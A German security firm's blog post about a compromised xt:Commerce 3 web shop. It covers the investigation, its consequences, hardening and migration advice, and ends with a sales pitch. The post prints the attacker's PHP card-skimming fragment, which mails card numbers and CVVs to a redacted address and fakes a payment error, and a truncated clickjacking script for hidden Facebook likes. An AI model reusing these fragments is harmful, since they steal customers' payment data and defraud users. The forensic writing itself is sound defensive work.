Einbruch in xt:Commerce 3? Gar kein Problem…

Veröffentlicht am von

Der folgende Blogpost basiert auf einer wahren Begebenheit im Januar 2015 bei mir in der Firma, nur die Namen wurden geändert.

Vor ein paar Tagen, das Telefon klingelt. „Ja, hier Meier, Firma Meierland GmbH. Hier rufen Kunden an und erzählen mir was von Phishing Mails mit Daten aus meinem Shop. Da stimmt was nicht, bitte checkt das mal.“

Herr Meier ist Inhaber eines prominenten Webshops und zählt in seiner Branche zu den Top 3 Anbietern. Er vertreibt seine Produkte über Amazon und seinen eigenen Webshop, der auf xt:Commerce 3 läuft. Trotz des alten technischen Unterbaus sind viele Produkte des Shops über Google gut zu finden – natürlich auch über AdWords. Der Shop verdient Geld.

Spuren finden

Schnell stellte sich im Rahmen einer Codeprüfung heraus, dass der Shop manipuliert wurde. Eine typische xt:Commerce 3 Installation besteht aus ca. 5.000 Dateien, etwa 200 davon sind in besonderem Maße für die Sicherheit relevant. Dort fanden sich dann auch verschlüsselte Codezeilen, die letztlich aufzeigten, was das Ziel der Kriminellen war.

Kreditkartendaten

Der Klassiker unter den Cyber-Raubzügen ist das Abgreifen von Kreditkartendaten – und so auch in diesem Fall. Über eine Schwachstelle im Shopsystem wurde das bestehende Kreditkarten-Zahlungsmodul um ein weiteres Modul ergänzt. Im Shop waren dadurch zwei Kartenzahlungsmodule verfügbar – ein funktionierendes, ein manipuliertes. Das manipulierte Modul nahm die Kreditkartendaten an, versendete sie per Mail an den Täter und verwies den Kunden dann mit einer Fehlermeldung darauf, dass er seine Kartendaten doch bitte noch einmal in dem anderen Kartenzahlmodul eingeben soll.

****
$message = „$firstname $lastname;$street;$city;$zip;$state;$country;$dayphone;$ccowner;$ccnumber;$ccexp;$cvv“;

if($ccnumber!=““){ mail(„**********@****.**“,“$servernya“, „$message“);
header(‚Location: https://‘.$_SERVER[‚SERVER_NAME‘].“/checkout_payment.php?error_message=Leider ist der $typ-Abrechnungserver temporar nicht verfugbar. Bitte nutzen Sie Kreditkarte mit 3-D-Secure-Prufung zur alternativen Direktzahlung. Wir bitten die Unannehmlichkeiten zu entschuldigen.“); exit;
}
****

Obwohl die Fehlermeldung weder hübsch gemacht noch besonders elegant daherkam, konnte sie ganz offenbar Daten erbeuten, ohne das Kunden bereits während des Bezahlvorgangs Verdacht schöpften. Der Einbrecher hatte sein Ziel erreicht.

Facebook Likes

Die weitere Untersuchung des Codes brachte dann noch ans Licht, dass der Shop auch dafür genutzt wurde, die Facebook-Seite eines Spielcasinos durch jede Menge „Like“-Klicks zu unterstützen. Obwohl ethisch verwerflich, war die technische Umsetzung doch durchaus interessant: ein paar wenige Zeilen Code genügten, um einem Kunden auf der Startseite des Shops eine unsichtbare Facebook-Likebox vorzusetzen. Wer dort auf ein Produkt klickte, löste im Hintergrund den besagten Like aus, wurde aber auch direkt zum gewünschten Produkt geleitet.

****
<script type=“text/javascript“>/*<![CDATA[*/(function(){var c=0,b=0,e=document.all?true:false;if(!e){document.capture
Events(Event.MOUSE
MOVE)}var d=document.create
Element(„iframe“);d.src=“
http://www.facebook.com/plugins/like.php?href=“+encodeURIComponent(„https://www.facebook.com/*****************“)+“&amp;layout=standard&amp;show_faces=true&amp;widt h=53&amp;action=like [….];return true}})();
</script>
****

Dass der Handel mit Facebook Likes kaum weniger kriminell ist als der Diebstahl von Kreditkartendaten, ist seit geraumer Zeit auch den Gerichten bekannt. Inwieweit Likes aus einem gehackten Webshop dem Nutznießer der Likes angelastet werden können, ist zwar noch nicht gerichtsfest dokumentiert – aus Sicht der Staatsanwaltschaft dürfte es aber wohl nicht völlig unmöglich sein, zumindest einen mittelbaren Zusammenhang herzustellen.

Konsequenzen

Wer Opfer eines solchen Cyber-Raubzugs wird, hat eine Menge Arbeit vor der Brust: der Einbruch muss aufgeklärt und die Schwachstellen behoben werden – ein äußerst undankbarer Job, bei dem man von der Polizei keine Hilfe erwarten darf. Das ist sehr bedauerlich, denn während beim Wohnungseinbruch die Spurensicherung von der öffentlichen Hand bezahlt wird, bleibt ein Shopbesitzer beim Aufklären des virtuellen Tatorts auf den Kosten für forensische Maßnahmen sitzen. Darüber hinaus wollen diverse Stellen informiert werden, insbesondere empfiehlt sich eine Strafanzeige bei der Polizei. Auch der Landesdatenschutzbeauftragte und die Kunden freuen sich über eine Information.

xt:Commerce 3 richtig härten

Obwohl xt:Commerce 3 so etwas wie das Windows XP der Webshops ist, ist es immer noch weit verbreitet. Wer es im Einsatz hat, muss das Thema Sicherheit aktiv angehen. Es gibt Security Patches, Community Hacks und einen Sicherheitsleitfaden, mit dem die bisher bekannten Sicherheitslöcher einigermaßen ökonomisch abgesichert werden können. Kommt dann noch ein Intrusion Detection System zum Einsatz, ein Codescanner und regelmäßige Online-Scans, kann auch ein xt:Commerce System noch relativ sicher betrieben werden. Falls Sie ein solches System betreiben und professionellen Support benötigen, nehmen Sie Kontakt mit uns auf.

Wer sich mit der Härtung eines Webshops beschäftigt, muss sich natürlich auch über Budgets für Sicherheit Gedanken machen. Die Kosten für die Absicherung müssen ins Verhältnis zum potenziellen Schaden gesetzt werden. Die Firma Meierland hat diese Rechnung auf die harte Tour präsentiert bekommen: der Shop fiel eine ganze Weile aus, ein Team von Technikexperten musste einige Tage arbeiten, viel Lauferei zu Behörden, viel unangenehme Korrespondenz mit Kunden. Wer diesen Fall vor Augen hat, kann sich selber überlegen, wie viel Geld ihm Sicherheit wert ist. Zumindest noch – denn in absehbarer Zeit wird mit dem IT-Sicherheitsgesetz eine Gesetzesänderung in Deutschland kommen, die das Thema Haftung im Online-Business deutlich schärfer fassen wird als bisher.

xt:Commerce migrieren

Mittelfristig führt kein Weg daran vorbei, xt:Commerce durch eine modernere Shopplattform zu ersetzen. Die Entwickler von xt:Commerce 3 stellen schon seit geraumer Zeit keine Sicherheitsupdates mehr zur Verfügung, der „Herstellersupport“ ist eingestellt. Spezialisierte Dienstleister – wie z.B. die tripuls – können xt:Commerce Installationen härten und am Laufen halten. Leider werden Security-Maßnahmen von den Shopbetreibern viel zu selten proaktiv beauftragt.

In den allermeisten Fällen ist der Umzug des eigenen Shopsystems auf eine neue Shopsoftware, z.B. auf das E-Commerc-System Magento, wirtschaftlich sinnvoll. Damit ein solcher Umzug gelingt, das Google-Ranking dabei nicht leidet und am Ende alles am richtigen Platz ist, stehen natürlich auch die zertifizierten Shopexperten von tripuls zur Seite.

Ausblick

Gelegentlich werden wir von Kunden beauftragt, deren selbstgehostete Server zu überprüfen. Dabei stellen wir oft schon beim ersten Scan fest, dass bspw. Datenbanken nahezu ungeschützt direkt vom Internet aus erreichbar sind. Wenn solche Server dann noch nachlässig gewartet sind, genügen Krininellen wenige Mausklicks, um solche Server zu übernehmen.

Vor einem Jahr schrieb ich an dieser Stelle, dass xt:Commerce eines der großen Hackziele werden würde. Dass wird sich auch dieses Jahr nicht ändern – im Gegenteil, es wird schlimmer. Seit den Snowden-Veröffentlichungen ist das Bewusstsein für Sicherheitslücken bei Herstellern und Hackern auf ein deutlich höheres Niveau gestiegen. Nahezu im Wochentakt werden Sicherheitslücken erkannt und behoben – doch diese Updates wollen auch getestet und installiert werden. Alle Shopbetreiber, egal ob sie xt:Commerce, Magento oder ein beliebiges anderes System nutzen, müssen sich mit einem proaktiven Sicherheitskonzept auseinandersetzen.

Die Meierland GmbH wird übrigens ihren Shop nach dieser Erfahrung umstellen.